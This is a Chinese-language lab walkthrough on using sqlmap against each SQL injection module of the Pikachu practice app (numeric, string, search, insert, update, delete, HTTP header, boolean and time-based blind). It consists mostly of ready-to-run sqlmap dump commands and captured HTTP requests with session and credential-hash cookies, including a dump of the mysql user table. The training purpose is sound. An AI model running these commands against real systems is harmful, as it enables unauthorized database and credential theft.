使用sqlmap对Pikachu中SQL-Inject进行注入

使用Sqlmap对Pikachu中SQL-Inject进行注入

1、数字型注入(post)

  需求：查看数据库pickchu中users表中所有数据

  sqlmap中输入：sqlmap -u "http://192.168.10.7:85/pikachu-master/vul/sqli/sqli_id.php" --data="id=1&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users --dump --smart --batch

2、字符型注入(get)

  需求：查看数据库pickchu中users表中所有数据

  sqlmap -u "http://192.168.10.7:85/pikachu-master/vul/sqli/sqli_str.php?name=vince&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users --dump --batch --smart

3、搜索型注入(get)

  需求：查看数据库pickchu中users表中所有数据

  sqlmap -u "http://192.168.10.7:85/pikachu-master/vul/sqli/sqli_search.php?name=vince&submit=%E6%90%9C%E7%B4%A2" -D pikachu -T users --dump --smart --batch

4、xx型注入(get)

  需求：查看数据库pickchu中users表中所有数据

  sqlmap -u "http://192.168.10.7:85/pikachu-master/vul/sqli/sqli_x.php?name=vince&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users --dump --smart --batch

5、insert注入(post)

 需求：查看数据库pickchu中users表中所有数据

 sqlmap -u "http://192.168.10.7:85/pikachu-master/vul/sqli/sqli_iu/sqli_reg.php" --data="username=test&password=123456&sex=&phonenum=&email=&add=&submit=submit" -D pikachu -T users --dump --smart --batch

6、update注入(post)

  登录成功后修改个人中心，使用burp抓取post包保存为updatapost.txt文件。这样就不用在sqlmap后面写--data="" --cookie=""
  updatapost.txt

POST /pikachu-master/vul/sqli/sqli_iu/sqli_edit.php HTTP/1.1
Host: 192.168.10.7:85
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 76
Origin: http://192.168.10.7:85
Connection: close
Referer: http://192.168.10.7:85/pikachu-master/vul/sqli/sqli_iu/sqli_edit.php
Cookie: PHPSESSID=iiaobqh1ck7a8fvjeg03n4d650
Upgrade-Insecure-Requests: 1

sex=%E7%94%B7&phonenum=1358956663&add=0&email=2566388%40qq.com&submit=submit

  将updatapost.txt文件放到安装sqlmap的PC中，这里是kail。在kail的根目录下创建tiansqlmap目录用来保存updatapost.txt"
  自己调用updatapost.txt 不用添加--data和cookie
  root@kalitian:/# sqlmap -r "/tiansqlmap/updatapost.txt" -D mysql -T user --dump --smart --batch

7、delete注入

  sqlmap -u "192.168.10.7:85/pikachu-master/vul/sqli/sqli_del.php?id=68" -D pikachu -T users --dump --smart --batch

8、http header注入

  登录后刷新使用burp抓包将get请求保存到headerget.txt

GET /pikachu-master/vul/sqli/sqli_header/sqli_header.php HTTP/1.1
Host: 192.168.10.7:85
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: http://192.168.10.7:85/pikachu-master/vul/sqli/sqli_header/sqli_header_login.php
Connection: close
Cookie: ant[uname]=admin; ant[pw]=10470c3b4b1fed12c3baac014be15fac67c6e815; PHPSESSID=iiaobqh1ck7a8fvjeg03n4d650
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

  复制保存到kali中/tiansqlmap/headerget.txt

  sqlmap -r "/tiansqlmap/headerget.txt" -D pikachu -T users --dump --level 3 --smart --batch

9、盲注(base on boolian)

  布尔类型在sqlmap中会非常慢，因为要一个一个字母去判断，可以添加多线程去跑

  root@kalitian:~# sqlmap -u "http://192.168.10.7:85/pikachu-master/vul/sqli/sqli_blind_b.php?name=vince&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users --dump --smart --batch

10、盲注(时间类型）

  注入时间会比较久

  sqlmap -u "http://192.168.10.7:85/pikachu-master/vul/sqli/sqli_blind_t.php?name=vince&submit=%E6%9F%A5%E8%AF%A2" -D pikachu -T users --dump --smart --batch